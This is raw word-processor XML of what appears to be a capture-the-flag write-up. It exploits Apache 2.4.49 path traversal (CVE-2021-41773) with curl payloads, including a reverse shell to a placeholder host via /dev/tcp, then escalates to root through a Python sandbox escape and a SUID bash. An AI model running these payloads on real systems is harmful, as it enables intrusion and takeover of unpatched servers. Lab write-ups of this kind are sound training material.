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PATH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mnfsvv9ya06h"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5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execution of the tool, we identified two open web ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</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8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now, we will direct our attention to the web service on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63900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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analysis, we determined that it is a completely static page, just an HTML template. Now, we will proceed to inspect the web service on port 8080.</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6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application through port 8080, we noticed that it is an Apache example page. After sending a request using curl with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-I</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to retrieve only the response headers, we observed that the server returns version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache/2.4.49 (Unix)</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39900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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searching for this specific Apache version (2.4.49), we identified two CVEs: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-41773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CVE-2021-42013. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both are related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</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Five Ways to Simulate Apache CVE-2021-41773 Exploits</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability</w:t>
        </w:r>
      </w:hyperlink>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test the following Remote Code Execution (RCE) payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:jc w:val="both"/>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curl &lt;ip-machine&gt;:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d "A=|echo;id"</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5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confirming remote code execution, we can now insert a reverse shell payload, which will result in a shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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&lt;ip-machine&gt;:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d "A=|/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'"</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1B">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917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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using curl with our payload, we successfully obtained a shell.</w:t>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98600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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b283d1rp1a35"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032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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8nu5j3ytr6vr" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to a fully interactive TTY:</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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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root directory, we were able to retrieve the first flag.</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84300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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our first user flag, it is time to escalate privileges in order to obtain our final flag. For this, we must escalate to the root user.</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the command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observed that we have permission to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3 /opt/chall.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as the root user, without needing to enter a password.</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73200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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 that we are dealing with a sandbox. To bypass the sandbox, we will use a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Template Injection (SSTI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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It is important to note that we cannot use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import, |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system. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we must always start with the key, in this case </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crowsec.</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98900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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begin. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crowsec</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an instance of the string class.</w:t>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5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When checking the MRO (Method Resolution Order) of</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crowsec.__class__</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe that the resolution order is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[&lt;class 'str'&gt;, &lt;class 'object'&gt;].</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means that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crowsec</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an instance of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">str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class, which inherits from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, we can conclude that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crowsec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an object and has methods. Using the MRO, we can individually access each of these objects and leverage the functionalities provided by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">str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object </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">classes.</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5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85900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Proceeding with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mro()[1].__subclasses__() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we obtain an extensive list of subclasses, including types such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int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list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dict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tuple</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, among others.</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51"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access the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">globals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of the class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;class 'ssl.SSLObject'&gt;</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since it imports the Python </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os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library.</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analyzing all subclasses in Visual Studio Code, we can identify the position corresponding to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;class 'ssl.SSLObject'&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to explore and access its global variables.</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67"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stepping back one position to index </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">185</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can access it.</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54100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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43600" cy="10541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914400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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invoking the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">popen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we achieved Remote Code Execution (RCE):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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proceed to grant the SUID permission set to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executable. By executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we obtain a shell with root privileges, leveraging the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument, which runs the binary with the permissions of its owner.</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Finally, we can retrieve the last flag.</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65"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14500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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4" name="image14.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.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5">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6">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50" name="image5.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image5.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Path</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0.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.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25.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 